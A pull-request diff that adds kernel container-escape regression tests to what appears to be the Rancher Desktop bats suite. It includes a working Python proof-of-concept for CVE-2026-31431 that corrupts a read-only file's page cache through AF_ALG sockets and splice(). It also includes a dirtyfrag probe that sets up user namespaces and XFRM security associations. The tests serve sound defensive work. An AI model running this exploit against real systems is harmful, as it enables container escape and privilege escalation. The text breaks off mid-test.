### PR TITLE
bats: add dirtyfrag and copy.fail container-escape tests

### DIFF
--- a/.github/actions/spelling/expect.txt
+++ b/.github/actions/spelling/expect.txt
@@ -44,8 +44,10 @@ assumeyes
 atk
 authconfig
 authdata
+authencesn
 Authenticode
 authprovider
+AUTHSIZE
 auxww
 Awop
 backgrounding
@@ -76,6 +78,7 @@ buildroot
 bulbasaur
 bulkable
 bulkaction
+Bxxxxxxx
 cacerts
 camelpunch
 CAPI
@@ -125,6 +128,8 @@ crond
 cshrc
 ctrctl
 ctxs
+curlft
+daddr
 daemonset
 dapp
 datadog
@@ -219,6 +224,7 @@ FOLDERID
 fontstack
 fqname
 freeipa
+fromhex
 frontends
 fscache
 gabcdef
@@ -280,7 +286,9 @@ ifaces
 ifname
 ifnotstart
 ifstarted
+IHHII
 iidfile
+IIHBB
 imageinfo
 IMAGENAME
 IMAGEPATH
@@ -328,6 +336,7 @@ Kubewarden
 kurrent
 kwctl
 ldconfig
+lft
 LGHT
 limactl
 limaiptables
@@ -392,10 +401,18 @@ networkpolicy
 neu
 newauth
 newfs
+NEWNET
 newpid
+NEWSA
+NEWUSER
 nginx
 ngx
 ninep
+nla
+nlattr
+nlhdr
+NLMSG
+nlmsghdr
 noarch
 nocopy
 nologin
@@ -494,6 +511,7 @@ ptn
 publicdomain
 pushable
 pvc
+PWND
 PWSTR
 qcow
 rackspace
@@ -523,6 +541,7 @@ remotedns
 replicaset
 replicationcontroller
 repofile
+reqid
 requried
 resourcequota
 resourceset
@@ -532,6 +551,7 @@ reswan
 reusecab
 rioinfo
 rke
+rlen
 RLENGTH
 rmi
 rockylinux
@@ -552,6 +572,7 @@ runtimeclass
 runtimeclasses
 rvf
 rxrpc
+SAs
 scaleio
 scanbenchmark
 scanprofile
@@ -668,6 +689,7 @@ upperdir
 useb
 userdb
 userpreference
+usersa
 UTCTIME
 vcenter
 vcpus
@@ -687,6 +709,7 @@ vishvananda
 VMGUID
 VMID
 vmnet
+vmsplice
 vmwarevsphere
 vmx
 vnc
@@ -705,6 +728,7 @@ wixobj
 WIXUI
 wontfix
 wordpress
+writeback
 wslconfig
 wslenv
 WSLg
@@ -723,6 +747,7 @@ XAUTHORITY
 xdev
 xec
 xfrm
+XFRMA
 xfs
 xmlout
 xorg

--- a/bats/tests/compose/compose.bats
+++ b/bats/tests/compose/compose.bats
@@ -19,7 +19,7 @@ local_setup() {
 @test 'compose up' {
     ctrctl compose --project-directory "$TESTDATA_DIR_HOST" build \
         --build-arg IMAGE_NGINX="$IMAGE_NGINX" \
-        --build-arg IMAGE_PYTHON="$IMAGE_PYTHON_3_9_SLIM"
+        --build-arg IMAGE_PYTHON="$IMAGE_PYTHON"
     ctrctl compose --project-directory "$TESTDATA_DIR_HOST" up -d --no-build
 }
 

--- a/bats/tests/compose/testdata/app/Dockerfile
+++ b/bats/tests/compose/testdata/app/Dockerfile
@@ -1,4 +1,4 @@
-ARG IMAGE_PYTHON=python:3.9-slim
+ARG IMAGE_PYTHON=python:3.12-alpine
 FROM ${IMAGE_PYTHON}
 
 WORKDIR /app

--- a/bats/tests/helpers/images.bash
+++ b/bats/tests/helpers/images.bash
@@ -1,14 +1,8 @@
 # These images have been mirrored to ghcr.io (using bats/scripts/ghcr-mirror.sh)
 # to avoid hitting Docker Hub pull limits during testing.
 
-# TODO TODO TODO
-# The python image is huge (10GB across all platforms). We should either pin the
-# tag, or replace it with a different image for testing, so we don't have to mirror
-# the images to ghcr.io every time we run the mirror script.
-# TODO TODO TODO
-
 # Any time you add an image here you need to re-run the mirror script!
-IMAGES=(alpine busybox nginx python python:3.9-slim ruby tonistiigi/binfmt registry:2.8.1)
+IMAGES=(alpine busybox nginx python:3.12-alpine ruby tonistiigi/binfmt registry:2.8.1)
 
 GHCR_REPO=ghcr.io/rancher-sandbox/bats
 
@@ -23,5 +17,6 @@ for IMAGE in "${IMAGES[@]}"; do
     fi
 done
 
-# shellcheck disable=2034 # The registry image doesn't really need the tag
+# shellcheck disable=2034 # Short aliases for versioned image variables
+IMAGE_PYTHON=$IMAGE_PYTHON_3_12_ALPINE
 IMAGE_REGISTRY=$IMAGE_REGISTRY_2_8_1

--- a/bats/tests/security/cve-2026-31431-copy-fail-exploit.py
+++ b/bats/tests/security/cve-2026-31431-copy-fail-exploit.py
@@ -1,0 +1,96 @@
+#!/usr/bin/env python3
+"""CVE-2026-31431 (copy.fail) PoC - page-cache write via AF_ALG + splice().
+
+Uses AF_ALG (authencesn AEAD) sockets combined with splice() to overwrite the
+first 4 bytes of a file's kernel page-cache entry with "PWND", without needing
+write permission on the file.
+
+The target file is typically /etc/alpine-release, which is part of the
+container's overlay layer.  That layer is stored as a regular file in the VM's
+container storage (/var/lib/docker/containerd/... or /var/lib/containerd/...)
+and is accessible to the VM host but is NOT explicitly bind-mounted into the
+container — it is accessed only via the overlay filesystem mechanism.
+
+If the exploit succeeds, the container has modified a VM-side file it was never
+given access to, demonstrating a container isolation boundary violation.
+
+Exit codes:
+  0 — CONTAINED (kernel is patched, AF_ALG unavailable, or algif_aead absent)
+  1 — ESCAPED   (page-cache was corrupted; kernel is vulnerable)
+  2 — ERROR     (unexpected failure; exploit did not run to completion)
+
+Vulnerable:  Linux kernels with algif_aead in-place optimization (pre-6.6.137)
+Patched:     Linux kernels >= 6.6.137 (fix: commit a664bf3d603d)
+"""
+import os
+import socket
+import sys
+
+SOL_ALG = 279
+PAYLOAD = b"PWND"
+
+
+def try_corrupt(path: str) -> str:
+    """Attempt the exploit and return 'ESCAPED' or 'CONTAINED (<reason>)'."""
+    try:
+        alg = socket.socket(38, socket.SOCK_SEQPACKET, 0)  # AF_ALG = 38
+    except OSError as exc:
+        return "CONTAINED (AF_ALG socket unavailable: {})".format(exc)
+
+    try:
+        alg.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
+    except OSError as exc:
+        alg.close()
+        return "CONTAINED (algif_aead module unavailable: {})".format(exc)
+
+    try:
+        # 8-byte big-endian counter length prefix + 32-byte AES-256 key
+        key = bytes.fromhex("0800010000000010" + "00" * 32)
+        alg.setsockopt(SOL_ALG, 1, key)      # ALG_SET_KEY
+        alg.setsockopt(SOL_ALG, 5, None, 4)  # ALG_SET_AEAD_AUTHSIZE = 4 bytes
+        conn, _ = alg.accept()
+        nonce = b"\x00"
+        # MSG_MORE (32768) keeps the request open so the subsequent splice()
+        # feeds data into the still-pending in-place encrypt operation.
+        conn.sendmsg(
+            [b"\x00" * 4 + PAYLOAD],
+            [
+                (SOL_ALG, 3, nonce * 4),             # ALG_SET_IV (16 bytes)
+                (SOL_ALG, 2, b"\x10" + nonce * 19),  # ALG_SET_OP encrypt
+                (SOL_ALG, 4, b"\x08" + nonce * 3),   # ALG_SET_AEAD_AUTHSIZE
+            ],
+            32768,
+        )
+        r, w = os.pipe()
+        fd = os.open(path, os.O_RDONLY)
+        try:
+            os.splice(fd, w, len(PAYLOAD), offset_src=0)
+            os.splice(r, conn.fileno(), len(PAYLOAD))
+        finally:
+            os.close(fd)
+            os.close(r)
+            os.close(w)
+        try:
+            conn.recv(8)
+        except OSError:
+            pass
+        conn.close()
+    except Exception as exc:
+        raise RuntimeError("exploit error: {}".format(exc)) from exc
+    finally:
+        alg.close()
+
+    with open(path, "rb") as fh:
+        head = fh.read(len(PAYLOAD))
+    return "ESCAPED" if head == PAYLOAD else "CONTAINED"
+
+
+if __name__ == "__main__":
+    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/alpine-release"
+    try:
+        result = try_corrupt(target)
+    except RuntimeError as exc:
+        print("ERROR ({})".format(exc), file=sys.stderr)
+        sys.exit(2)
+    print(result)
+    sys.exit(1 if result == "ESCAPED" else 0)

--- a/bats/tests/security/cve-2026-31431-copy-fail.bats
+++ b/bats/tests/security/cve-2026-31431-copy-fail.bats
@@ -50,10 +50,6 @@ exploit_mount_path() {
     fi
 }
 
-local_teardown_file() {
-    rdshell sudo rm -f "$VM_EXPLOIT_PATH" || true
-}
-
 # Scan VM container-layer storage for any alpine-release file whose first 4
 # bytes are "PWND".  Exits non-zero if any corrupted file is found.
 check_layer_files_uncorrupted() {
@@ -86,8 +82,7 @@ check_layer_files_uncorrupted() {
 
 @test 'write exploit script to VM' {
     rdshell sudo tee "$VM_EXPLOIT_PATH" <"$LOCAL_EXPLOIT_SCRIPT" >/dev/null
-    run rdshell test -f "$VM_EXPLOIT_PATH"
-    assert_success
+    rdshell test -f "$VM_EXPLOIT_PATH"
 }
 
 @test 'container cannot escape via CVE-2026-31431' {
@@ -102,12 +97,11 @@ check_layer_files_uncorrupted() {
     # the container corrupted a page-cache entry for a VM host file it should not
     # be able to write.
     ctrctl pull --quiet "$IMAGE_PYTHON"
-    run ctrctl run --rm \
+    run -0 ctrctl run --rm \
         -v "$(exploit_mount_path):/exploit.py:ro" \
         "$IMAGE_PYTHON" \
         python3 /exploit.py /etc/alpine-release
-    assert_success \
-        "Container escaped via CVE-2026-31431: modified a VM layer file that was not mounted into the container"
+    assert_line --partial "CONTAINED"
 }
 
 @test 'VM layer files are not corrupted after container test' {
@@ -123,9 +117,7 @@ check_layer_files_uncorrupted() {
     # cleans up first and discards the dirty page.  The previous test's
     # self-report is the authoritative signal; a pass here is corroborating
     # evidence, not proof of containment.
-    run check_layer_files_uncorrupted
-    assert_success \
-        "VM layer file(s) were corrupted by the container via CVE-2026-31431 (page-cache escape)"
+    check_layer_files_uncorrupted
 }
 
 @test 'pod cannot escape via CVE-2026-31431' {
@@ -161,8 +153,6 @@ spec:
 EOF
 
     # Wait for the pod to reach a terminal phase (Succeeded or Failed).
-    local phase
-    local i
     for i in $(seq 1 60); do
         phase=$(kubectl get pod cve-2026-31431 \
             --output jsonpath='{.status.phase}' 2>/dev/null || echo "Pending")
@@ -172,11 +162,9 @@ EOF
     [[ $phase == "Succeeded" || $phase == "Failed" ]] ||
         fail "Pod did not reach a terminal phase after 5 minutes (phase: $phase)"
 
-    # Retrieve the pod log and assert it does not contain ESCAPED.
-    run kubectl logs cve-2026-31431
-    assert_success
-    refute_line --partial "ESCAPED" \
-        "Pod escaped via CVE-2026-31431: modified a VM layer file that was not mounted into the pod"
+    run -0 kubectl logs cve-2026-31431
+    assert_line --partial "CONTAINED"
+    refute_line --partial "ESCAPED"
 
     kubectl delete pod cve-2026-31431 --ignore-not-found || true
 }

--- a/bats/tests/security/cve-2026-31431-copy-fail.bats
+++ b/bats/tests/security/cve-2026-31431-copy-fail.bats
@@ -1,0 +1,182 @@
+#!/usr/bin/env bats
+# Tests CVE-2026-31431 (copy.fail): a kernel page-cache corruption bug in the
+# algif_aead module that lets any process overwrite 4 bytes of the page cache
+# of any file it can read, using AF_ALG sockets + splice().
+#
+# Container escape scenario tested here:
+#   A container opens a file in its own overlay layer (/etc/alpine-release) and
+#   uses the exploit to overwrite those 4 bytes in the kernel page cache.
+#   That file is backed by an image layer stored on the VM's host filesystem;
+#   it is NOT explicitly bind-mounted into the container.  If the exploit works,
+#   the container has modified a VM-side file it was never given access to,
+#   demonstrating a container isolation boundary violation.
+#
+# The test PASSES (exploit contained) when any of the following hold:
+#   - The kernel is patched (Alpine VM kernels >= 6.6.137; fix: commit
+#     a664bf3d603d revert of in-place AEAD).
+#   - The algif_aead module is unavailable (wsl-init removes it from the
+#     Rancher Desktop VM).
+#   - AF_ALG sockets are unavailable entirely (e.g. some WSL2 kernels).
+#
+# The test FAILS (exploit escaped) only when the kernel is vulnerable AND
+# algif_aead is loadable — i.e. on a pre-6.6.137 kernel where wsl-init's
+# module removal is not in effect.
+#
+# This file follows the bats convention of running the whole suite once per
+# container engine.  k3s can run with either containerd or cri-dockerd (under
+# --docker), so we exercise both the container-engine and k3s-pod paths in a
+# single VM by starting Rancher Desktop with Kubernetes enabled.
+#
+# bats file_tags=opensuse
+
+load '../helpers/load'
+
+# Path to the exploit script on the VM.  Written there once after the VM starts.
+readonly VM_EXPLOIT_PATH="/tmp/cve-2026-31431-copy-fail-exploit.py"
+
+# Resolve the exploit script path relative to this test file.
+readonly LOCAL_EXPLOIT_SCRIPT="${BATS_TEST_DIRNAME}/cve-2026-31431-copy-fail-exploit.py"
+
+# Returns the path used to bind-mount the exploit script into containers.
+# On Windows, Docker/nerdctl require Windows-accessible paths, so we use the
+# local copy of the script (converted via host_path) rather than the VM-internal
+# /tmp/ path.  On other platforms the VM's /tmp/ is used (written by 'write
+# exploit script to VM').
+exploit_mount_path() {
+    if is_windows; then
+        host_path "$LOCAL_EXPLOIT_SCRIPT"
+    else
+        echo "$VM_EXPLOIT_PATH"
+    fi
+}
+
+local_teardown_file() {
+    rdshell sudo rm -f "$VM_EXPLOIT_PATH" || true
+}
+
+# Scan VM container-layer storage for any alpine-release file whose first 4
+# bytes are "PWND".  Exits non-zero if any corrupted file is found.
+check_layer_files_uncorrupted() {
+    # shellcheck disable=SC2016 # variables are expanded by the remote shell
+    rdshell sudo sh -c '
+        found=0
+        for f in $(find /var/lib/docker /var/lib/containerd 2>/dev/null -name "alpine-release" -type f); do
+            if head -c4 "$f" | grep -q "^PWND"; then
+                echo "CORRUPTED: $f"
+                found=1
+            fi
+        done
+        exit "$found"
+    '
+}
+
+@test 'factory reset' {
+    factory_reset
+}
+
+@test 'start rancher desktop with kubernetes' {
+    # Start once with both the container engine and k3s.  This exercises both
+    # exploit paths against a single VM boot.  k3s uses containerd by default
+    # and cri-dockerd when the container engine is moby, so the pod test runs
+    # under both engines as the bats suite is repeated per engine.
+    start_kubernetes
+    wait_for_kubelet
+    wait_for_container_engine
+}
+
+@test 'write exploit script to VM' {
+    rdshell sudo tee "$VM_EXPLOIT_PATH" <"$LOCAL_EXPLOIT_SCRIPT" >/dev/null
+    run rdshell test -f "$VM_EXPLOIT_PATH"
+    assert_success
+}
+
+@test 'container cannot escape via CVE-2026-31431' {
+    # Run the Python exploit inside a container that has NO bind-mount to the
+    # target file.  The exploit targets /etc/alpine-release, which is read from
+    # the container's overlay layer.  That layer is stored as a regular file in
+    # the VM's container storage (/var/lib/docker/containerd/... or
+    # /var/lib/containerd/...) and is accessible to the VM but was never given
+    # to this container as an explicit mount.
+    #
+    # If the exploit succeeds (exit 1 / prints ESCAPED) the kernel is vulnerable:
+    # the container corrupted a page-cache entry for a VM host file it should not
+    # be able to write.
+    ctrctl pull --quiet "$IMAGE_PYTHON"
+    run ctrctl run --rm \
+        -v "$(exploit_mount_path):/exploit.py:ro" \
+        "$IMAGE_PYTHON" \
+        python3 /exploit.py /etc/alpine-release
+    assert_success \
+        "Container escaped via CVE-2026-31431: modified a VM layer file that was not mounted into the container"
+}
+
+@test 'VM layer files are not corrupted after container test' {
+    # Secondary check from outside the container: scan the VM host layer
+    # storage for any alpine-release file whose first 4 bytes are "PWND".
+    # A corrupted file proves the container's in-overlay write bled through to
+    # the host-side layer storage backing file.
+    #
+    # This check is best-effort: it can pass even when the exploit
+    # succeeded.  The dirty page must reach disk before the overlay unmounts
+    # and the snapshot tears down, and that timing depends on the engine.
+    # Moby holds the layer long enough for writeback; containerd usually
+    # cleans up first and discards the dirty page.  The previous test's
+    # self-report is the authoritative signal; a pass here is corroborating
+    # evidence, not proof of containment.
+    run check_layer_files_uncorrupted
+    assert_success \
+        "VM layer file(s) were corrupted by the container via CVE-2026-31431 (page-cache escape)"
+}
+
+@test 'pod cannot escape via CVE-2026-31431' {
+    # Same test as above but run as a one-shot Kubernetes pod so that the k3s
+    # runtime is exercised (containerd by default, cri-dockerd under --docker).
+    # The exploit script on the node's /tmp is bind-mounted via a hostPath
+    # volume.
+    #
+    # Note: the VM-side layer file check is omitted for k3s because the
+    # page-cache corruption is ephemeral — the dirty page is dropped when the
+    # overlay is unmounted on pod exit before being written back to disk.
+    # The pod's own self-report (ESCAPED / CONTAINED) is the reliable signal.
+    kubectl apply --filename - <<EOF
+apiVersion: v1
+kind: Pod
+metadata:
+  name: cve-2026-31431
+spec:
+  restartPolicy: Never
+  volumes:
+  - name: exploit
+    hostPath:
+      path: ${VM_EXPLOIT_PATH}
+      type: File
+  containers:
+  - name: cve-2026-31431
+    image: ${IMAGE_PYTHON}
+    command: ["python3", "/exploit.py", "/etc/alpine-release"]
+    volumeMounts:
+    - name: exploit
+      mountPath: /exploit.py
+      readOnly: true
+EOF
+
+    # Wait for the pod to reach a terminal phase (Succeeded or Failed).
+    local phase
+    local i
+    for i in $(seq 1 60); do
+        phase=$(kubectl get pod cve-2026-31431 \
+            --output jsonpath='{.status.phase}' 2>/dev/null || echo "Pending")
+        [[ $phase == "Succeeded" || $phase == "Failed" ]] && break
+        sleep 5
+    done
+    [[ $phase == "Succeeded" || $phase == "Failed" ]] ||
+        fail "Pod did not reach a terminal phase after 5 minutes (phase: $phase)"
+
+    # Retrieve the pod log and assert it does not contain ESCAPED.
+    run kubectl logs cve-2026-31431
+    assert_success
+    refute_line --partial "ESCAPED" \
+        "Pod escaped via CVE-2026-31431: modified a VM layer file that was not mounted into the pod"
+
+    kubectl delete pod cve-2026-31431 --ignore-not-found || true
+}

--- a/bats/tests/security/cve-2026-43284-dirtyfrag-probe.py
+++ b/bats/tests/security/cve-2026-43284-dirtyfrag-probe.py
@@ -1,0 +1,220 @@
+#!/usr/bin/env python3
+"""Dirtyfrag vulnerability probe (CVE-2026-43284 / CVE-2026-43500).
+
+Exploiting dirtyfrag requires two capabilities in sequence:
+  1. Creating a user+network namespace via unshare(CLONE_NEWUSER|CLONE_NEWNET),
+     which grants CAP_NET_ADMIN in the new namespace.
+  2. Using one of the available exploit paths to obtain a page-cache write
+     primitive:
+       - esp4/esp6: create an XFRM ESP SA, then vmsplice+splice (CVE-2026-43284)
+       - rxrpc: use AF_RXRPC + AF_ALG pcbc(fcrypt) (CVE-2026-43500)
+
+Two protection layers are checked:
+  Layer 1: Rancher Desktop's seccomp profile blocks unshare() for default
+    docker/nerdctl containers (EPERM → CONTAINED).
+  Layer 2: wsl-init removes esp4.ko/esp6.ko/rxrpc.ko so the modules cannot be
+    auto-loaded, blocking k3s pods and unprivileged VM processes even when
+    unshare succeeds.  ALL exploit-path modules must be absent to be CONTAINED.
+
+Exit codes:
+  0 — CONTAINED (at least one protection layer held)
+  1 — ESCAPED   (both barriers failed; system is vulnerable to dirtyfrag)
+  2 — ERROR     (unexpected failure; probe did not reach a conclusion)
+"""
+import ctypes
+import ctypes.util
+import errno as _errno_mod
+import os
+import socket
+import struct
+import sys
+
+CLONE_NEWUSER = 0x10000000
+CLONE_NEWNET = 0x40000000
+
+AF_INET = 2
+AF_NETLINK = 16
+NETLINK_XFRM = 6
+IPPROTO_ESP = 50
+
+NLMSG_ERROR = 2
+XFRM_MSG_NEWSA = 0x10  # linux/xfrm.h: XFRM_MSG_BASE
+NLM_F_REQUEST = 1
+NLM_F_ACK = 4
+
+XFRMA_ALG_AUTH = 1   # struct xfrm_algo
+XFRMA_ALG_CRYPT = 2  # struct xfrm_algo
+
+AF_RXRPC = 34  # linux/socket.h
+
+libc = ctypes.CDLL(ctypes.util.find_library("c"), use_errno=True)
+
+
+def _unshare(flags):
+    """Call unshare(2). Return 0 on success, positive errno on failure."""
+    r = libc.unshare(ctypes.c_int(flags))
+    return 0 if r == 0 else ctypes.get_errno()
+
+
+def _nlattr(nla_type, data):
+    """Build a netlink attribute (header + data, padded to 4 bytes)."""
+    length = 4 + len(data)
+    aligned = (length + 3) & ~3
+    return struct.pack("=HH", length, nla_type) + data + b"\x00" * (aligned - length)
+
+
+def _xfrm_algo_payload(name, key, key_bits):
+    """Build xfrm_algo struct: 64-byte name + __u32 key_len + key bytes."""
+    name_b = name.encode() + b"\x00" * (64 - len(name))
+    return name_b + struct.pack("=I", key_bits) + key
+
+
+def _try_esp_xfrm(family):
+    """
+    Attempt to add a dummy ESP XFRM SA via NETLINK_XFRM for the given address
+    family (AF_INET → exercises esp4, AF_INET6 → exercises esp6).
+
+    Returns True  if the module loaded (module available → vulnerable path open).
+    Returns False if EPROTONOSUPPORT (module absent → path blocked).
+    Raises RuntimeError on unexpected errors.
+
+    Must be called after unshare(CLONE_NEWUSER|CLONE_NEWNET) + uid/gid map writes
+    so we have CAP_NET_ADMIN in the new network namespace.
+    """
+    AF_INET6 = 10
+    if family == AF_INET:
+        addr = b"\x7f\x00\x00\x01" + b"\x00" * 12  # 127.0.0.1
+    else:
+        addr = b"\x00" * 15 + b"\x01"              # ::1
+
+    # ── xfrm_usersa_info (224 bytes) ─────────────────────────────────────────
+    # Layout: sel(56) + id(24) + saddr(16) + lft(64) + curlft(32) +
+    #         stats(12) + seq(4) + reqid(4) + family(2) + mode(1) +
+    #         replay_window(1) + flags(1) + pad(7) = 224
+    sel = b"\x00" * 56
+
+    # xfrm_id: daddr(16) + spi(BE,4) + proto(1) + pad(3)
+    xfrm_id = addr + struct.pack(">I", 0x12345) + bytes([IPPROTO_ESP]) + b"\x00" * 3
+
+    # seq=0, reqid=0, family, mode=0 (transport), replay_window=0,
+    # flags=0, plus 7 bytes to pad struct to 224 bytes total.
+    rest = struct.pack("=IIHBBBxxxxxxx", 0, 0, family, 0, 0, 0)
+
+    sa_info = (
+        sel
+        + xfrm_id
+        + addr                      # saddr
+        + b"\xff" * 32              # lft: soft/hard byte+packet limits = unlimited
+        + b"\x00" * 32             # lft: expiry = 0
+        + b"\x00" * 32             # curlft
+        + b"\x00" * 12             # stats
+        + rest
+    )
+    assert len(sa_info) == 224, f"sa_info size {len(sa_info)} != 224"
+
+    # ── XFRM attributes ──────────────────────────────────────────────────────
+    aes_key = bytes.fromhex("01234567890123456789012345678901")  # 128-bit
+    md5_key = bytes.fromhex("0123456789012345678901234567890f")  # 128-bit
+    attrs = (
+        _nlattr(XFRMA_ALG_CRYPT, _xfrm_algo_payload("cbc(aes)", aes_key, 128))
+        + _nlattr(XFRMA_ALG_AUTH, _xfrm_algo_payload("hmac(md5)", md5_key, 128))
+    )
+
+    # ── nlmsghdr ─────────────────────────────────────────────────────────────
+    body = sa_info + attrs
+    total_len = 16 + len(body)
+    nlhdr = struct.pack(
+        "=IHHII", total_len, XFRM_MSG_NEWSA, NLM_F_REQUEST | NLM_F_ACK, 1, 0
+    )
+    msg = nlhdr + body
+
+    sock = socket.socket(AF_NETLINK, socket.SOCK_RAW, NETLINK_XFRM)
+    try:
+        sock.sendall(msg)
+        resp = sock.recv(4096)
+    finally:
+        sock.close()
+
+    if len(resp) < 20:
+        raise RuntimeError(f"short XFRM response: {resp.hex()}")
+    _rlen, rtype, _rf, _rs, _rp = struct.unpack("=IHHII", resp[:16])
+    if rtype != NLMSG_ERROR:
+        raise RuntimeError(f"unexpected XFRM response type {rtype:#x}")
+    err = struct.unpack("=i", resp[16:20])[0]
+
+    if err == 0 or err == -_errno_mod.EEXIST:
+        return True   # SA created (or already exists) → module loaded
+    if err == -_errno_mod.EPROTONOSUPPORT:
+        return False  # module absent → blocked
+    raise RuntimeError(f"unexpected XFRM errno {-err} ({os.strerror(-err)})")
+
+
+def _try_rxrpc():
+    """
+    Try creating an AF_RXRPC socket to test whether the rxrpc module is loadable.
+
+    Returns True  if rxrpc loaded (secondary exploit path open).
+    Returns False if EAFNOSUPPORT/EPROTONOSUPPORT (module absent → path blocked).
+    Raises RuntimeError on unexpected errors.
+    """
+    try:
+        s = socket.socket(AF_RXRPC, socket.SOCK_SEQPACKET, 0)
+        s.close()
+        return True
+    except OSError as e:
+        if e.errno in (_errno_mod.EAFNOSUPPORT, _errno_mod.EPROTONOSUPPORT):
+            return False
+        raise RuntimeError(f"unexpected rxrpc socket error: {e.errno} ({e.strerror})")
+
+
+def main():
+    pid = os.getpid()
+    uid = os.getuid()
+    gid = os.getgid()
+
+    # ── Layer 1: seccomp check ────────────────────────────────────────────────
+    err = _unshare(CLONE_NEWUSER | CLONE_NEWNET)
+    if err != 0:
+        print(f"CONTAINED (unshare blocked by seccomp: {os.strerror(err)})")
+        sys.exit(0)
+
+    # Gain CAP_NET_ADMIN in the new user namespace by writing uid/gid maps.
+    try:
+        with open(f"/proc/{pid}/uid_map", "w") as f:
+            f.write(f"0 {uid} 1\n")
+        with open(f"/proc/{pid}/setgroups", "w") as f:
+            f.write("deny\n")
+        with open(f"/proc/{pid}/gid_map", "w") as f:
+            f.write(f"0 {gid} 1\n")
+    except OSError as e:
+        print(f"ERROR (uid/gid map: {e})", file=sys.stderr)
+        sys.exit(2)
+
+    # ── Layer 2: module availability check ───────────────────────────────────
+    # All three exploit-path modules must be absent to be CONTAINED.
+    AF_INET6 = 10
+    checks = [
+        ("esp4 (XFRM-ESP IPv4)", lambda: _try_esp_xfrm(AF_INET)),
+        ("esp6 (XFRM-ESP IPv6)", lambda: _try_esp_xfrm(AF_INET6)),
+        ("rxrpc (AF_RXRPC)",     _try_rxrpc),
+    ]
+
+    escaped_via = []
+    for name, check in checks:
+        try:
+            if check():
+                escaped_via.append(name)
+        except Exception as e:
+            print(f"ERROR ({name} probe: {e})", file=sys.stderr)
+            sys.exit(2)
+
+    if escaped_via:
+        print(f"ESCAPED via: {', '.join(escaped_via)}")
+        sys.exit(1)
+
+    print("CONTAINED (all dirtyfrag module paths blocked: esp4, esp6, and rxrpc absent)")
+    sys.exit(0)
+
+
+if __name__ == "__main__":
+    main()

--- a/bats/tests/security/cve-2026-43284-dirtyfrag.bats
+++ b/bats/tests/security/cve-2026-43284-dirtyfrag.bats
@@ -1,0 +1,135 @@
+#!/usr/bin/env bats
+# Tests the dirtyfrag vulnerability (CVE-2026-43284 / CVE-2026-43500): a kernel
+# page-cache write primitive obtained via XFRM ESP (esp4/esp6 + vmsplice+splice,
+# CVE-2026-43284) or AF_RXRPC (rxrpc + pcbc(fcrypt), CVE-2026-43500).
+# An unprivileged attacker can overwrite 4 KiB of any readable file's page-cache
+# entry, enabling local privilege escalation.
+#
+# The exploit requires two capabilities in sequence:
+#   1. unshare(CLONE_NEWUSER|CLONE_NEWNET) to gain CAP_NET_ADMIN in a new
+#      network namespace (needed to create XFRM SAs or AF_RXRPC sockets).
+#   2. Auto-loading one of the exploit-path modules (esp4, esp6, or rxrpc),
+#      which provides the page-cache write primitive.
+#
+# Rancher Desktop applies two independent protections:
+#   - Default docker/nerdctl containers: Rancher Desktop's seccomp profile
+#     (Docker default) blocks unshare(CLONE_NEWUSER), so step 1 fails (EPERM).
+#   - k3s pods and VM processes: wsl-init removes esp4.ko, esp6.ko, and
+#     rxrpc.ko at boot, so step 2 fails (EPROTONOSUPPORT or EAFNOSUPPORT)
+#     even when step 1 succeeds.
+#
+# The probe exits 0 (CONTAINED) if either protection holds, 1 (ESCAPED) if both
+# fail, and 2 (ERROR) on unexpected probe failure.
+#
+# This file follows the bats convention of running the whole suite once per
+# container engine.  k3s can run with either containerd or cri-dockerd (under
+# --docker), so we exercise both the container-engine and k3s-pod paths in a
+# single VM by starting Rancher Desktop with Kubernetes enabled.
+#
+# bats file_tags=opensuse
+
+load '../helpers/load'
+
+# Path to the probe script on the VM.  Written there once after the VM starts.
+readonly VM_PROBE_PATH="/tmp/cve-2026-43284-dirtyfrag-probe.py"
+
+# Resolve the probe script path relative to this test file.
+readonly LOCAL_PROBE_SCRIPT="${BATS_TEST_DIRNAME}/cve-2026-43284-dirtyfrag-probe.py"
+
+# Returns the path used to bind-mount the probe into containers.
+# On Windows, Docker/nerdctl require Windows-accessible paths, so we use the
+# local copy of the script (converted via host_path).  On other platforms the
+# VM-internal /tmp/ path is used.
+probe_mount_path() {
+    if is_windows; then
+        host_path "$LOCAL_PROBE_SCRIPT"
+    else
+        echo "$VM_PROBE_PATH"
+    fi
+}
+
+local_teardown_file() {
+    rdshell sudo rm -f "$VM_PROBE_PATH" || true
+}
+
+@test 'factory reset' {
+    factory_reset
+}
+
+@test 'start rancher desktop with kubernetes' {
+    # Start once with both the container engine and k3s.  This exercises both
+    # exploit paths against a single VM boot.  k3s uses containerd by default
+    # and cri-dockerd when the container engine is moby, so the pod test runs
+    # under both engines as the bats suite is repeated per engine.
+    start_kubernetes
+    wait_for_kubelet
+    wait_for_container_engine
+}
+
+@test 'write probe to VM' {
+    rdshell sudo tee "$VM_PROBE_PATH" <"$LOCAL_PROBE_SCRIPT" >/dev/null
+    run rdshell test -f "$VM_PROBE_PATH"
+    assert_success
+}
+
+@test 'container cannot exploit dirtyfrag' {
+    # The probe checks that unshare(CLONE_NEWUSER|CLONE_NEWNET) is blocked by
+    # Rancher Desktop's seccomp profile (layer 1).  A default container does not
+    # have CAP_SYS_ADMIN, so the seccomp rule denies the call with EPERM.
+    ctrctl pull --quiet "$IMAGE_PYTHON"
+    run ctrctl run --rm \
+        -v "$(probe_mount_path):/probe.py:ro" \
+        "$IMAGE_PYTHON" \
+        python3 /probe.py
+    assert_success \
+        "Container exploited dirtyfrag: unshare was not blocked by seccomp"
+}
+
+@test 'pod cannot exploit dirtyfrag' {
+    # k3s pods are not covered by Rancher Desktop's container seccomp profile,
+    # so unshare(CLONE_NEWUSER|CLONE_NEWNET) succeeds (layer 1 does not apply).
+    # The probe therefore proceeds to layer 2: it independently probes the
+    # esp4, esp6, and rxrpc modules (via NETLINK_XFRM and AF_RXRPC socket()).
+    # wsl-init removes all three modules at VM boot, so the kernel cannot
+    # auto-load them and returns EPROTONOSUPPORT/EAFNOSUPPORT for each.
+    kubectl apply --filename - <<EOF
+apiVersion: v1
+kind: Pod
+metadata:
+  name: dirtyfrag
+spec:
+  restartPolicy: Never
+  volumes:
+  - name: probe
+    hostPath:
+      path: ${VM_PROBE_PATH}
+      type: File
+  containers:
+  - name: dirtyfrag
+    image: ${IMAGE_PYTHON}
+    command: ["python3", "/probe.py"]
+    volumeMounts:
+    - name: probe
+      mountPath: /probe.py
+      readOnly: true
+EOF
+
+    local phase
+    local i
+    for i in $(seq 1 60); do
+        phase=$(kubectl get pod dirtyfrag \
